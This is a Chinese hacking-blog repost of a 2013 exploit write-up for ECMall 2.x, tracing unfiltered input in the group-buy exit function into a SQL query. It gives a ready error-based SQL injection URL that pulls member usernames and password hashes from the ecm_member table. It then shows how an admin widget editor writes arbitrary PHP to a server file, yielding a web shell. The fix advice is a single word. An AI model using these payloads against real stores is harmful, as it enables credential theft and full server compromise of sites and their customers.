记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

ecmall 2.x通杀SQL注入至后台getshell

2013-10-24 12:50
app/buyer_groupbuy.app.php
 
 

function exit_group()
{
$id = empty($_GET['id']) ? 0 : $_GET['id']; //没过滤你懂的。
if (!$id)
{
$this->show_warning('no_such_groupbuy');
return false;
}

// 判断是否能退团
if (!$this->_ican($id, ACT)) //跟进
{
$this->show_warning('Hacking Attempt');
return;
}
......
}
function _ican($id, $act = '')
{
......
$group = current($this->_member_mod->getRelatedData('join_groupbuy', $this->visitor->info['user_id'], array(
'conditions' => 'gb.group_id=' . $id, //带入
'order' => 'gb.group_id DESC',
'fields' => 'gb.state,groupbuy_log.order_id'
)));
......
}

eccore/model/mode.base.php


function getRelatedData($relation_name, $ids, $find_param = array())
{
......
/* 构造查询条件 */
$conditions = $alias . '.' . $relation_info['foreign_key'] . ' ' . db_create_in($ids); //主键值限定
$conditions .= $relation_info['ext_limit'] ?
' AND ' . $this->_getExtLimit($relation_info['ext_limit'], $alias)
: '';
$conditions .= is_string($find_param['conditions']) ? ' AND ' . $find_param['conditions'] : '';
$find_param['conditions'] = $conditions; //带入
......
return $model->find($find_param);//跟进
}
function find($params = array())
{
extract($this->_initFindParams($params));

/* 字段(SELECT FROM) */
$fields = $this->getRealFields($fields);
$fields == '' && $fields = '*';

$tables = $this->table . ' ' . $this->alias;

/* 左联结(LEFT JOIN) */
$join_result = $this->_joinModel($tables, $join);

/* 原来为($join_result || $index_key),忘了最初的用意,默认加上主键应该是只为了为获得索引的数组服务的,因此只跟索引键是否是主键有关 */
if ($index_key == $this->prikey || (is_array($index_key) && in_array($this->prikey, $index_key)))
{
/* 如果索引键里有主键,则默认在要查询字段后加上主键 */
$fields .= ",{$this->alias}.{$this->prikey}";
}

/* 条件(WHERE) */
$conditions = $this->_getConditions($conditions, true);

/* 排序(ORDER BY) */
$order && $order = ' ORDER BY ' . $this->getRealFields($order);

/* 分页(LIMIT) */
$limit && $limit = ' LIMIT ' . $limit;
if ($count)
{
$this->_updateLastQueryCount("SELECT COUNT(*) as c FROM {$tables}{$conditions}");
}

/* 完整的SQL */
$sql = "SELECT {$fields} FROM {$tables}{$conditions}{$order}{$limit}";

return $index_key ? $this->db->getAllWithIndex($sql, $index_key) :
$this->db->getAll($sql);
//带入查询,结束.
}

 

http://localhost/ecmall/index.php?app=buyer_groupbuy&act=exit_group&id=1 union select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(user_name,password) from ecm_member limit 0,1))a from information_schema.tables group by a)b
 
 
 
后台GETSHELL的话就太多了没细看,因为是后台权限没多少用,只举一列.
 
 

function edit()
{
$name = empty($_GET['name']) ? 0 : trim($_GET['name']);
if (!$name)
{
$this->show_warning('no_such_widget');

return;
}
$script_file = $this->_get_file($name, $_GET['file']);
if (!IS_POST)
{
$this->assign('code', file_get_contents($script_file));
$this->display('widget.form.html');
}
else
{
if (!file_put_contents($script_file, stripslashes($_POST['code'])))
{
$this->show_warning('edit_file_failed');

return;
}

$this->show_message('edit_file_successed');
}
}
function _get_file($name, $type = 'script')
{
$file = ROOT_PATH . '/external/widgets/' . $name;
switch ($type)
{
case 'script':
return $file . '/main.widget.php';
break;
case 'template':
return $file . '/widget.html';
break;
}
}

 

 
直接访问http://localhost/ecmall/admin/index.php?app=widget&act=edit&name=advt&file=script修改就行,对应的地址是http://localhost/ecmall/external/widgets/advt/main.widget.php 
 

注入的前提是登陆会员,不过默认都开启了注册功能。
 
 
 


 
修复方案:

过滤
 
知识来源: www.2cto.com/Article/201310/252274.html

阅读:171847 | 评论:0 | 标签:注入

想收藏或者和大家分享这篇好文章→复制链接地址

“ecmall 2.x通杀SQL注入至后台getshell”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云